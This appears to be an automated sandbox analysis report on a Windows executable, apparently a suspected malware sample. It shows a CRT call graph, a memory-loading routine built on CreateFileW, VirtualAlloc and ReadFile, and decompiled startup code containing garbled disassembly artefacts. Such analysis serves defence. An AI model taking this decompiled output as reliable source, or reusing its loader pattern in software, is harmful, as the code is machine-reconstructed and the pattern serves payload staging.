6413->6415 6414->6411 6414->6415 6417 8af295 6414->6417 6415->6409 6415->6412 6415->6413 6419 8afbb7 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6415->6419 6416 8af2c9 GetFileType 6416->6417 6417->6415 6417->6416 6418 8afbb7 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6417->6418 6418->6417 6419->6415 6421 8afaca 6420->6421 6422 8ae910 6420->6422 6423 8b0388 __malloc_crt 58 API calls 6421->6423 6426 8af457 GetModuleFileNameW 6422->6426 6424 8afaf0 _memmove 6423->6424 6425 8afb06 FreeEnvironmentStringsW 6424->6425 6425->6422 6427 8af48b _wparse_cmdline 6426->6427 6428 8b0388 __malloc_crt 58 API calls 6427->6428 6429 8af4cb _wparse_cmdline 6427->6429 6428->6429 6429->6362 6431 8af6ad __NMSG_WRITE 6430->6431 6435 8ae92b 6430->6435 6432 8b0340 __calloc_crt 58 API calls 6431->6432 6440 8af6d6 __NMSG_WRITE 6432->6440 6433 8af72d 6434 8b0308 _free 58 API calls 6433->6434 6434->6435 6435->6367 6435->6368 6436 8b0340 __calloc_crt 58 API calls 6436->6440 6437 8af752 6438 8b0308 _free 58 API calls 6437->6438 6438->6435 6439 8b18e2 __NMSG_WRITE 58 API calls 6439->6440 6440->6433 6440->6435 6440->6436 6440->6437 6440->6439 6441 8af769 6440->6441 6442 8b1058 __invoke_watson 8 API calls 6441->6442 6443 8af775 6442->6443 6446 8aef1d __IsNonwritableInCurrentImage 6444->6446 6775 8b1391 6446->6775 6447 8aef3b __initterm_e 6449 8aef5a _doexit __IsNonwritableInCurrentImage 6447->6449 6778 8b137c 6447->6778 6449->6370 6844 8ae750 GetPEB 6450->6844 6452 8a1011 6453 8a1017 CreateFileW GetFileSize VirtualAlloc ReadFile 6452->6453 6454 8a108a 6453->6454 6454->6375 6472 8af17a 6454->6472 6456 8ae9bc 6455->6456 6457 8ae9c1 6455->6457 6459 8af776 __FF_MSGBANNER 58 API calls 6456->6459 6458 8af7d3 __NMSG_WRITE 58 API calls 6457->6458 6460 8ae9c9 6458->6460 6459->6457 6461 8aeec1 __mtinitlocknum 3 API calls 6460->6461 6462 8ae9d3 6461->6462 6462->6348 6464 8af776 __FF_MSGBANNER 58 API calls 6463->6464 6465 8aeedf 6464->6465 6466 8af7d3 __NMSG_WRITE 58 API calls 6465->6466 6467 8aeee7 6466->6467 6845 8aef95 6467->6845 6471 8aeefe 6471->6363 6473 8af04b _doexit 58 API calls 6472->6473 6474 8af189 6473->6474 6474->6375 6476 8af04b _doexit 58 API calls 6475->6476 6477 8aef0d 6476->6477 6477->6378 6519 8b13d6 6478->6519 6480 8aefba __init_pointers __initp_misc_winsig 6520 8b0178 EncodePointer 6480->6520 6482 8aefd2 __init_pointers 6483 8afc25 34 API calls 6482->6483 6483->6382 6485 8b02c6 6484->6485 6486 8aee04 6485->6486 6521 8afbb7 6485->6521 6486->6385 6497 8afb16 6486->6497 6489 8aee7a 6488->6489 6490 8aee80 6488->6490 6524 8afb34 6489->6524 6492 8b01d3 DeleteCriticalSection 6490->6492 6494 8b01ef 6490->6494 6527 8b0308 6492->6527 6495 8b01fb DeleteCriticalSection 6494->6495 6496 8aee0d 6494->6496 6495->6494 6496->6351 6498 8afb2d TlsAlloc 6497->6498 6499 8aee1a 6497->6499 6499->6385 6499->6390 6502 8b0347 6500->6502 6503 8aee32 6502->6503 6505 8b0365 6502->6505 6553 8b24d4 6502->6553 6503->6393 6506 8afb72 6503->6506 6505->6502 6505->6503 6561 8afebe Sleep 6505->6561 6507 8afb8c TlsSetValue 6506->6507 6508 8afb88 6506->6508 6507->6396 6508->6396 6510 8aed53 __mtinitlocknum 6509->6510 6564 8b0189 6510->6564 6512 8aed90 6513 8aedaa 6512->6513 6571 8aede8 6512->6571 6515 8b0189 __lock 58 API calls 6513->6515 6516 8aedb1 ___addlocaleref 6515->6516 6574 8aedf1 6516->6574 6518 8aeddc __mtinitlocknum 6518->6400 6519->6480 6520->6482 6522 8afbc7 6521->6522 6523 8afbd4 InitializeCriticalSectionAndSpinCount 6521->6523 6522->6485 6523->6485 6525 8afb4b TlsFree 6524->6525 6526 8afb47 6524->6526 6525->6490 6526->6490 6528 8b0311 HeapFree 6527->6528 6532 8b033a __dosmaperr 6527->6532 6529 8b0326 6528->6529 6528->6532 6533 8b10b7 6529->6533 6532->6490 6536 8aecd8 GetLastError 6533->6536 6535 8b032c GetLastError 6535->6532 6550 8afb53 6536->6550 6538 8aeced 6539 8aed3b SetLastError 6538->6539 6540 8b0340 __calloc_crt 55 API calls 6538->6540 6539->6535 6541 8aed00 6540->6541 6541->6539 6542 8afb72 __getptd_noexit TlsSetValue 6541->6542 6543 8aed14 6542->6543 6544 8aed1a 6543->6544 6545 8aed32 6543->6545 6546 8aed47 __initptd 55 API calls 6544->6546 6547 8b0308 _free 55 API calls 6545->6547 6548 8aed22 GetCurrentThreadId 6546->6548 6549 8aed38 6547->6549 6548->6539 6549->6539 6551 8afb6a TlsGetValue 6550->6551 6552 8afb66 6550->6552 6551->6538 6552->6538 6554 8b24df 6553->6554 6558 8b24fa 6553->6558 6555 8b24eb 6554->6555 6554->6558 6557 8b10b7 __mtinitlocknum 57 API calls 6555->6557 6556 8b250a RtlAllocateHeap 6556->6558 6559 8b24f0 6556->6559 6557->6559 6558->6556 6558->6559 6562 8b13b0 DecodePointer 6558->6562 6559->6502 6561->6505 6563 8b13c3 6562->6563 6563->6558 6565 8b019a 6564->6565 6566 8b01ad EnterCriticalSection 6564->6566 6577 8b0211 6565->6577 6566->6512 6568 8b01a0 6568->6566 6569 8aeed7 __lock 57 API calls 6568->6569 6570 8b01ac 6569->6570 6570->6566 6769 8b02f3 LeaveCriticalSection 6571->6769 6573 8aedef 6573->6513 6770 8b02f3 LeaveCriticalSection 6574->6770 6576 8aedf8 6576->6518 6578 8b021d __mtinitlocknum 6577->6578 6579 8b023c 6578->6579 6599 8af776 6578->6599 6588 8b025f __mtinitlocknum 6579->6588 6641 8b0388 6579->6641 6586 8b025a 6590 8b10b7 __mtinitlocknum 58 API calls 6586->6590 6587 8b0269 6591 8b0189 __lock 58 API calls 6587->6591 6588->6568 6590->6588 6592 8b0270 6591->6592 6593 8b027d 6592->6593 6594 8b0295 6592->6594 6595 8afbb7 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6593->6595 6596 8b0308 _free 58 API calls 6594->6596 6597 8b0289 6595->6597 6596->6597 6647 8b02b1 6597->6647 6650 8af99d 6599->6650 6601 8af77d 6602 8af99d __FF_MSGBANNER 58 API calls 6601->6602 6604 8af78a 6601->6604 6602->6604 6603 8af7d3 __NMSG_WRITE 58 API calls 6605 8af7a2 6603->6605 6604->6603 6607 8af7ac 6604->6607 6606 8af7d3 __NMSG_WRITE 58 API calls 6605->6606 6606->6607 6608 8af7d3 6607->6608 6609 8af7f1 __NMSG_WRITE 6608->6609 6610 8af99d __FF_MSGBANNER 55 API calls 6609->6610 6637 8af918 6609->6637 6612 8af804 6610->6612 6614 8af91d GetStdHandle 6612->6614 6616 8af99d __FF_MSGBANNER 55 API calls 6612->6616 6613 8af981 6638 8aeec1 6613->6638 6615 8af92b _strlen 6614->6615 6614->6637 6620 8af964 WriteFile 6615->6620 6615->6637 6617 8af815 6616->6617 6617->6614 6618 8af827 6617->6618 6618->6637 6680 8b18e2 6618->6680 6620->6637 6622 8af854 GetModuleFileNameW 6624 8af874 6622->6624 6628 8af884 __NMSG_WRITE 6622->6628 6623 8af985 6625 8b1058 __invoke_watson 8 API calls 6623->6625 6626 8b18e2 __NMSG_WRITE 55 API calls 6624->6626 6627 8af98f 6625->6627 6626->6628 6628->6623 6629 8af8ca 6628->6629 6689 8b1a57 6628->6689 6629->6623 6698 8b19eb 6629->6698 6633 8b19eb __NMSG_WRITE 55 API calls 6634 8af901 6633->6634 6634->6623 6635 8af908 6634->6635 6707 8b1b15 EncodePointer 6635->6707 6732 8b1cfb 6637->6732 6747 8aee8d GetModuleHandleExW 6638->6747 6644 8b0396 6641->6644 6643 8b0253 6643->6586 6643->6587 6644->6643 6646 8b03a9 6644->6646 6750 8b2397 6644->6750 6646->6643 6646->6644 6767 8afebe Sleep 6646->6767 6768 8b02f3 LeaveCriticalSection 6647->6768 6649 8b02b8 6649->6588 6651 8af9a7 6650->6651 6652 8b10b7 __mtinitlocknum 58 API calls 6651->6652 6653 8af9b1 6651->6653 6654 8af9cd 6652->6654 6653->6601 6657 8b1048 6654->6657 6660 8b101d DecodePointer 6657->6660 6661 8b1030 6660->6661 6666 8b1058 IsProcessorFeaturePresent 6661->6666 6664 8b101d __fptostr 8 API calls 6665 8af9d8 6664->6665 6665->6601 6667 8b1063 6666->6667 6672 8b0eeb 6667->6672 6671 8b1047 6671->6664 6673 8b0f05 _memset __call_reportfault 6672->6673 6674 8b0f25 IsDebuggerPresent 6673->6674 6675 8afee1 __call_reportfault SetUnhandledExceptionFilter UnhandledExceptionFilter 6674->6675 6676 8b0fe9 __call_reportfault 6675->6676 6677 8b1cfb ___crtMessageBoxW 6 API calls 6676->6677 6678 8b100c 6677->6678 6679 8afecc GetCurrentProcess TerminateProcess 6678->6679 6679->6671 6681 8b18ed 6680->6681 6682 8b18fb 6680->6682 6681->6682 6687 8b1914 6681->6687 6683 8b10b7 __mtinitlocknum 58 API calls 6682->6683 6684 8b1905 6683->6684 6685 8b1048 __fptostr 9 API calls 6684->6685 6686 8af847 6685->6686 6686->6622 6686->6623 6687->6686 6688 8b10b7 __mtinitlocknum 58 API calls 6687->6688 6688->6684 6690 8b1a65 6689->6690 6691 8b1a69 6690->6691 6692 8b1a6e 6690->6692 6696 8b1aa8 6690->6696 6691->6692 6693 8b10b7 __mtinitlocknum 58 API calls 6691->6693 6692->6629 6694 8b1a99 6693->6694 6695 8b1048 __fptostr 9 API calls 6694->6695 6695->6692 6696->6692 6697 8b10b7 __mtinitlocknum 58 API calls 6696->6697 6697->6694 6699 8b1a05 6698->6699 6701 8b19f7 6698->6701 6700 8b10b7 __mtinitlocknum 58 API calls 6699->6700 6706 8b1a0f 6700->6706 6701->6699 6704 8b1a31 6701->6704 6702 8b1048 __fptostr 9 API calls 6703 8af8ea 6702->6703 6703->6623 6703->6633 6704->6703 6705 8b10b7 __mtinitlocknum 58 API calls 6704->6705 6705->6706 6706->6702 6708 8b1b49 ___crtIsPackagedApp 6707->6708 6709 8b1c08 IsDebuggerPresent 6708->6709 6710 8b1b58 LoadLibraryExW 6708->6710 6713 8b1c2d 6709->6713 6714 8b1c12 6709->6714 6711 8b1b6f GetLastError 6710->6711 6712 8b1b95 GetProcAddress 6710->6712 6715 8b1b7e LoadLibraryExW 6711->6715 6729 8b1c25 6711->6729 6716 8b1ba9 7 API calls 6712->6716 6712->6729 6718 8b1c20 6713->6718 6719 8b1c32 DecodePointer 6713->6719 6717 8b1c19 OutputDebugStringW 6714->6717 6714->6718 6715->6712 6715->6729 6720 8b1bf1 GetProcAddress EncodePointer 6716->6720 6721 8b1c05 6716->6721 6717->6718 6722 8b1c59 DecodePointer DecodePointer 6718->6722 6718->6729 6730 8b1c71 6718->6730 6719->6729 6720->6721 6721->6709 6722->6730 6723 8b1ca9 DecodePointer 6724 8b1c95 DecodePointer 6723->6724 6727 8b1cb0 6723->6727 6724->6729 6725 8b1cfb ___crtMessageBoxW 6 API calls 6728 8b1cf7 6725->6728 6727->6724 6731 8b1cc1 DecodePointer 6727->6731 6728->6637 6729->6725 6730->6723 6730->6724 6731->6724 6733 8b1d03 6732->6733 6734 8b1d05 IsProcessorFeaturePresent 6732->6734 6733->6613 6736 8b3425 6734->6736 6739 8b33d4 IsDebuggerPresent 6736->6739 6740 8b33e9 __call_reportfault 6739->6740 6745 8afee1 SetUnhandledExceptionFilter UnhandledExceptionFilter 6740->6745 6742 8b33f1 __call_reportfault 6746 8afecc GetCurrentProcess TerminateProcess 6742->6746 6744 8b340e 6744->6613 6745->6742 6746->6744 6748 8aeeb8 ExitProcess 6747->6748 6749 8aeea6 GetProcAddress 6747->6749 6749->6748 6751 8b2412 6750->6751 6760 8b23a3 6750->6760 6752 8b13b0 __calloc_impl DecodePointer 6751->6752 6753 8b2418 6752->6753 6754 8b10b7 __mtinitlocknum 57 API calls 6753->6754 6766 8b240a 6754->6766 6755 8af776 __FF_MSGBANNER 57 API calls 6758 8b23ae 6755->6758 6756 8b23d6 RtlAllocateHeap 6756->6760 6756->6766 6757 8af7d3 __NMSG_WRITE 57 API calls 6757->6758 6758->6755 6758->6757 6758->6760 6761 8aeec1 __mtinitlocknum 3 API calls 6758->6761 6759 8b23fe 6763 8b10b7 __mtinitlocknum 57 API calls 6759->6763 6760->6756 6760->6758 6760->6759 6762 8b13b0 __calloc_impl DecodePointer 6760->6762 6764 8b23fc 6760->6764 6761->6758 6762->6760 6763->6764 6765 8b10b7 __mtinitlocknum 57 API calls 6764->6765 6765->6766 6766->6644 6767->6646 6768->6649 6769->6573 6770->6576 6774 8b02f3 LeaveCriticalSection 6771->6774 6773 8af455 6773->6408 6774->6773 6776 8b1394 EncodePointer 6775->6776 6776->6776 6777 8b13ae 6776->6777 6777->6447 6781 8b1280 6778->6781 6780 8b1387 6780->6449 6782 8b128c __mtinitlocknum 6781->6782 6789 8af039 6782->6789 6788 8b12b3 __mtinitlocknum 6788->6780 6790 8b0189 __lock 58 API calls 6789->6790 6791 8af040 6790->6791 6792 8b12c4 DecodePointer DecodePointer 6791->6792 6793 8b12a1 6792->6793 6794 8b12f1 6792->6794 6803 8b12be 6793->6803 6794->6793 6806 8b2e78 6794->6806 6796 8b1354 EncodePointer EncodePointer 6796->6793 6797 8b1328 6797->6793 6800 8b03cf __realloc_crt 61 API calls 6797->6800 6801 8b1342 EncodePointer 6797->6801 6798 8b1303 6798->6796 6798->6797 6813 8b03cf 6798->6813 6802 8b133c 6800->6802 6801->6796 6802->6793 6802->6801 6840 8af042 6803->6840 6807 8b2e81 6806->6807 6808 8b2e96 HeapSize 6806->6808 6809 8b10b7 __mtinitlocknum 58 API calls 6807->6809 6808->6798 6810 8b2e86 6809->6810 6811 8b1048 __fptostr 9 API calls 6810->6811 6812 8b2e91 6811->6812 6812->6798 6815 8b03d6 6813->6815 6816 8b0413 6815->6816 6818 8b2429 6815->6818 6839 8afebe Sleep 6815->6839 6816->6797 6819 8b243d 6818->6819 6820 8b2432 6818->6820 6821 8b2445 6819->6821 6827 8b2452 6819->6827 6822 8b2397 __malloc_crt 58 API calls 6820->6822 6823 8b0308 _free 58 API calls 6821->6823 6824 8b243a 6822->6824 6836 8b244d __dosmaperr 6823->6836 6824->6815 6825 8b248a 6828 8b13b0 __calloc_impl DecodePointer 6825->6828 6826 8b245a HeapReAlloc 6826->6827 6826->6836 6827->6825 6827->6826 6831 8b24ba 6827->6831 6832 8b13b0 __calloc_impl DecodePointer 6827->6832 6835 8b24a2 6827->6835 6829 8b2490 6828->6829 6830 8b10b7 __mtinitlocknum 58 API calls 6829->6830 6830->6836 6833 8b10b7 __mtinitlocknum 58 API calls 6831->6833 6832->6827 6834 8b24bf GetLastError 6833->6834 6834->6836 6837 8b10b7 __mtinitlocknum 58 API calls 6835->6837 6836->6815 6838 8b24a7 GetLastError 6837->6838 6838->6836 6839->6815 6843 8b02f3 LeaveCriticalSection 6840->6843 6842 8af049 6842->6788 6843->6842 6844->6452 6846 8af04b _doexit 58 API calls 6845->6846 6847 8aeef2 6846->6847 6848 8af04b 6847->6848 6849 8af057 __mtinitlocknum 6848->6849 6850 8b0189 __lock 51 API calls 6849->6850 6851 8af05e 6850->6851 6852 8af117 _doexit 6851->6852 6853 8af08c DecodePointer 6851->6853 6868 8af165 6852->6868 6853->6852 6855 8af0a3 DecodePointer 6853->6855 6862 8af0b3 6855->6862 6857 8af174 __mtinitlocknum 6857->6471 6859 8af0c0 EncodePointer 6859->6862 6860 8af15c 6861 8aeec1 __mtinitlocknum 3 API calls 6860->6861 6863 8af165 6861->6863 6862->6852 6862->6859 6864 8af0d0 DecodePointer EncodePointer 6862->6864 6865 8af172 6863->6865 6873 8b02f3 LeaveCriticalSection 6863->6873 6866 8af0e2 DecodePointer DecodePointer 6864->6866 6865->6471 6866->6862 6869 8af16b 6868->6869 6870 8af145 6868->6870 6874 8b02f3 LeaveCriticalSection 6869->6874 6870->6857 6872 8b02f3 LeaveCriticalSection 6870->6872 6872->6860 6873->6865 6874->6870 7397 8affb0 7398 8affda 7397->7398 7399 8affe7 7397->7399 7400 8b1cfb ___crtMessageBoxW 6 API calls 7398->7400 7401 8b1cfb ___crtMessageBoxW 6 API calls 7399->7401 7400->7399 7404 8afff7 __except_handler4 7401->7404 7402 8b00c4 __except_handler4 7403 8b010f 7402->7403 7405 8b00ff 7402->7405 7407 8b1cfb ___crtMessageBoxW 6 API calls 7402->7407 7404->7402 7404->7403 7409 8b004e __IsNonwritableInCurrentImage 7404->7409 7406 8b1cfb ___crtMessageBoxW 6 API calls 7405->7406 7406->7403 7407->7405 7415 8b1742 RtlUnwind 7409->7415 7410 8b0126 7412 8b1cfb ___crtMessageBoxW 6 API calls 7410->7412 7411 8b008c __except_handler4 7411->7410 7413 8b1cfb ___crtMessageBoxW 6 API calls 7411->7413 7414 8b0136 __except_handler4 7412->7414 7413->7410 7415->7411 8038 8aea30 8039 8aecd8 __getptd_noexit 58 API calls 8038->8039 8040 8aea39 8039->8040 8100 8a2271 8101 8aee33 8100->8101 8102 8aee67 8101->8102 8103 8afb72 __getptd_noexit TlsSetValue 8101->8103 8104 8aee70 __mtterm 61 API calls 8102->8104 8105 8aee46 8103->8105 8106 8aee6c 8104->8106 8105->8102 8107 8aee4c 8105->8107 8108 8aed47 __initptd 58 API calls 8107->8108 8109 8aee54 GetCurrentThreadId 8108->8109

                          Executed Functions

                          Function 00120402 Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 114 120402-1204e6 GetPEB call 120776 * 7 call 120744 CreateFileW 131 1205c6 114->131 132 1204ec-1204f7 114->132 133 1205c8-1205cd 131->133 132->131 137 1204fd-12050d VirtualAlloc 132->137 134 1205d3-1205d8 133->134 135 1205cf 133->135 141 1205f4-1205f7 134->141 135->134 137->131 138 120513-120522 ReadFile 137->138 138->131 140 120528-120547 VirtualAlloc 138->140 142 1205c2-1205c4 140->142 143 120549-12055e call 1206db 140->143 144 1205da-1205de 141->144 145 1205f9-1205fe 141->145 142->133 154 120560-12056b 143->154 155 120597-1205a8 call 120776 143->155 147 1205e0-1205e8 144->147 148 1205ea-1205ec 144->148 149 120600-120608 VirtualFree 145->149 150 12060b-120613 145->150 147->141 152 1205f3 148->152 153 1205ee-1205f1 148->153 149->150 152->141 153->141 156 12056e-120595 call 1206db 154->156 155->133 161 1205aa-1205af 155->161 156->155 162 1205b1-1205b2 CloseHandle 161->162 163 1205b5-1205c0 VirtualFree 161->163 162->163 163->141
                          APIs
                          • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 001204DC
                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00120506
                          • ReadFile.KERNELBASE(00000000,00000000,00120248,?,00000000), ref: 0012051D
                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0012053F
                          • CloseHandle.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,0012019C,7FDFFF66), ref: 001205B2
                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 001205BD
                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0012019C), ref: 00120608
                          Memory Dump Source
                          • Source File: 00000005.00000002.464093968.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_120000_xmtxpy.jbxd
                          Similarity
                          • API ID: Virtual$AllocFileFree$CloseCreateHandleRead
                          • String ID:
                          • API String ID: 721982790-0
                          • Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                          • Instruction ID: 47a17514a964efb98d4adaa5735c13926ba66e04ccf7698547f6858255342762
                          • Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                          • Instruction Fuzzy Hash: E7619131E00224ABCB15DFB4D884BAEB7B5AF58750F248259F505EB391EB349D118F54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008A4173 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84COMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 94%
                          			E008A4173(signed int __eax, void* __edx, void* __edi) {
				intOrPtr* _t14;
				void* _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				intOrPtr _t23;
				signed int _t32;
				void* _t42;
				void* _t43;
				signed int _t44;
				void* _t46;
				void* _t47;

				_t43 = __edi;
				_t42 = __edx;
				_t44 = __eax & 0x0000ffff;
				E008AF990(2);
				_t14 = 0x5a4d;
				_t47 =  *0x8a0000 - _t14; // 0x5a4d
				if(_t47 == 0) {
					_t14 =  *0x8a003c; // 0xe0
					__eflags =  *((intOrPtr*)(_t14 + 0x8a0000)) - 0x4550;
					if(__eflags != 0) {
						goto L2;
					} else {
						__eflags =  *((intOrPtr*)(_t14 + 0x8a0018)) - 0x10b;
						if(__eflags != 0) {
							goto L2;
						} else {
							_t32 = 0;
							__eflags =  *((intOrPtr*)(_t14 + 0x8a0074)) - 0xe;
							if(__eflags > 0) {
								__eflags =  *(_t14 + 0x8a00e8);
								_t6 =  *(_t14 + 0x8a00e8) != 0;
								__eflags = _t6;
								_t32 = 0 | _t6;
							}
						}
					}
				} else {
					L2:
					_t32 = 0;
				}
				 *(_t46 - 0x1c) = _t32;
				asm("in al, 0xe8");
				asm("lds ecx, [eax]");
				 *_t14 =  *_t14 + _t14;
				_t48 = _t14;
				if(_t14 == 0) {
					E008AE9B0(0x1c);
				}
				_t15 = E008AEDFA(_t32, _t43, _t48);
				_t49 = _t15;
				if(_t15 == 0) {
					_t15 = E008AE9B0(0x10);
				}
				E008AFA79(_t15);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				_t17 = E008AF1A3(_t32, _t43, _t44, _t49); // executed
				if(_t17 < 0) {
					E008AE9B0(0x1b);
				}
				 *0x8c101c = GetCommandLineW(); // executed
				_t19 = E008AFAB9(); // executed
				 *0x8bf0c8 = _t19;
				_t20 = E008AF457();
				_t51 = _t20;
				if(_t20 < 0) {
					_t20 = E008AEED7(_t32, _t42, _t43, _t44, _t51, 8);
				}
				_t21 = E008AF694(_t20, _t32, _t42, _t43, _t44);
				_t52 = _t21;
				if(_t21 < 0) {
					E008AEED7(_t32, _t42, _t43, _t44, _t52, 9);
				}
				_t22 = E008AEF11(1);
				_t53 = _t22;
				if(_t22 != 0) {
					E008AEED7(_t32, _t42, _t43, _t44, _t53, _t22);
				}
				_t23 = E008AFEF7();
				_push(_t44);
				E008A1000(0x8a0000, 0, _t23); // executed
				_t45 = _t23;
				 *((intOrPtr*)(_t46 - 0x24)) = _t23;
				if(_t32 == 0) {
					E008AF17A(_t45);
				}
				E008AEF02();
				 *(_t46 - 4) = 0xfffffffe;
				return E008AFF95(_t45);
			}

















                          0x008a4173
                          0x008a4173
                          0x008ae871
                          0x008ae876
                          0x008ae87c
                          0x008ae881
                          0x008ae888
                          0x008ae88e
                          0x008ae893
                          0x008ae89d
                          0x00000000
                          0x008ae89f
                          0x008ae8a4
                          0x008ae8ab
                          0x00000000
                          0x008ae8ad
                          0x008ae8ad
                          0x008ae8af
                          0x008ae8b6
                          0x008ae8b8
                          0x008ae8be
                          0x008ae8be
                          0x008ae8be
                          0x008ae8be
                          0x008ae8b6
                          0x008ae8ab
                          0x008ae88a
                          0x008ae88a
                          0x008ae88a
                          0x008ae88a
                          0x008ae8c1
                          0x008ae8c3
                          0x008ae8c5
                          0x008ae8c7
                          0x008ae8c9
                          0x008ae8cb
                          0x008ae8cf
                          0x008ae8d4
                          0x008ae8d5
                          0x008ae8da
                          0x008ae8dc
                          0x008ae8e0
                          0x008ae8e5
                          0x008ae8e6
                          0x008ae8eb
                          0x008ae8ef
                          0x008ae8f6
                          0x008ae8fa
                          0x008ae8ff
                          0x008ae906
                          0x008ae90b
                          0x008ae910
                          0x008ae915
                          0x008ae91a
                          0x008ae91c
                          0x008ae920
                          0x008ae925
                          0x008ae926
                          0x008ae92b
                          0x008ae92d
                          0x008ae931
                          0x008ae936
                          0x008ae939
                          0x008ae93f
                          0x008ae941
                          0x008ae944
                          0x008ae949
                          0x008ae94a
                          0x008ae94f
                          0x008ae958
                          0x008ae95d
                          0x008ae95f
                          0x008ae964
                          0x008ae967
                          0x008ae967
                          0x008ae96c
                          0x008ae9a1
                          0x008ae9af

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: _fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__wsetargv__wsetenvp__wwincmdln
                          • String ID: .$
                          • API String ID: 965155184-2223841709
                          • Opcode ID: d09755f6bcf8eb5ce504bbe7748687d9629dc642e3d684f51b6e9c39cebf42d6
                          • Instruction ID: 87fadd7b4f139cd9cb2d781ec796443bfced0a472ba5b3baf0f4ca82842a2aec
                          • Opcode Fuzzy Hash: d09755f6bcf8eb5ce504bbe7748687d9629dc642e3d684f51b6e9c39cebf42d6
                          • Instruction Fuzzy Hash: B621B360A0071599FB607BF8988676B2650FF13754F244C7AFA05DADD3EFB8C8808A53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008A30E5 Relevance: 16.6, APIs: 11, Instructions: 68COMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 91%
                          			E008A30E5(void* __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t10;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;
				intOrPtr _t18;
				void* _t27;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t41;

				_t39 = __esi;
				_t38 = __edi;
				_t37 = __edx;
				_t27 = __ebx;
				 *((intOrPtr*)(__ecx - 0x7f)) =  *((intOrPtr*)(__ecx - 0x7f)) + __eax;
				asm("in al, 0xe8");
				asm("lds ecx, [eax]");
				 *__ecx =  *__ecx + __ecx;
				_t43 = __ecx;
				if(__ecx == 0) {
					E008AE9B0(0x1c);
				}
				_t10 = E008AEDFA(_t27, _t38, _t43);
				_t44 = _t10;
				if(_t10 == 0) {
					_t10 = E008AE9B0(0x10);
				}
				E008AFA79(_t10);
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				_t12 = E008AF1A3(_t27, _t38, _t39, _t44); // executed
				if(_t12 < 0) {
					E008AE9B0(0x1b);
				}
				 *0x8c101c = GetCommandLineW(); // executed
				_t14 = E008AFAB9(); // executed
				 *0x8bf0c8 = _t14;
				_t15 = E008AF457();
				_t46 = _t15;
				if(_t15 < 0) {
					_t15 = E008AEED7(_t27, _t37, _t38, _t39, _t46, 8);
				}
				_t16 = E008AF694(_t15, _t27, _t37, _t38, _t39);
				_t47 = _t16;
				if(_t16 < 0) {
					E008AEED7(_t27, _t37, _t38, _t39, _t47, 9);
				}
				_t17 = E008AEF11(1);
				_t48 = _t17;
				if(_t17 != 0) {
					E008AEED7(_t27, _t37, _t38, _t39, _t48, _t17);
				}
				_t18 = E008AFEF7();
				_push(_t39);
				E008A1000(0x8a0000, 0, _t18); // executed
				_t40 = _t18;
				 *((intOrPtr*)(_t41 - 0x24)) = _t18;
				if(_t27 == 0) {
					E008AF17A(_t40);
				}
				E008AEF02();
				 *(_t41 - 4) = 0xfffffffe;
				return E008AFF95(_t40);
			}















                          0x008a30e5
                          0x008a30e5
                          0x008a30e5
                          0x008a30e5
                          0x008a30e8
                          0x008ae8c3
                          0x008ae8c5
                          0x008ae8c7
                          0x008ae8c9
                          0x008ae8cb
                          0x008ae8cf
                          0x008ae8d4
                          0x008ae8d5
                          0x008ae8da
                          0x008ae8dc
                          0x008ae8e0
                          0x008ae8e5
                          0x008ae8e6
                          0x008ae8eb
                          0x008ae8ef
                          0x008ae8f6
                          0x008ae8fa
                          0x008ae8ff
                          0x008ae906
                          0x008ae90b
                          0x008ae910
                          0x008ae915
                          0x008ae91a
                          0x008ae91c
                          0x008ae920
                          0x008ae925
                          0x008ae926
                          0x008ae92b
                          0x008ae92d
                          0x008ae931
                          0x008ae936
                          0x008ae939
                          0x008ae93f
                          0x008ae941
                          0x008ae944
                          0x008ae949
                          0x008ae94a
                          0x008ae94f
                          0x008ae958
                          0x008ae95d
                          0x008ae95f
                          0x008ae964
                          0x008ae967
                          0x008ae967
                          0x008ae96c
                          0x008ae9a1
                          0x008ae9af

                          APIs
                          • _fast_error_exit.LIBCMT ref: 008AE8CF
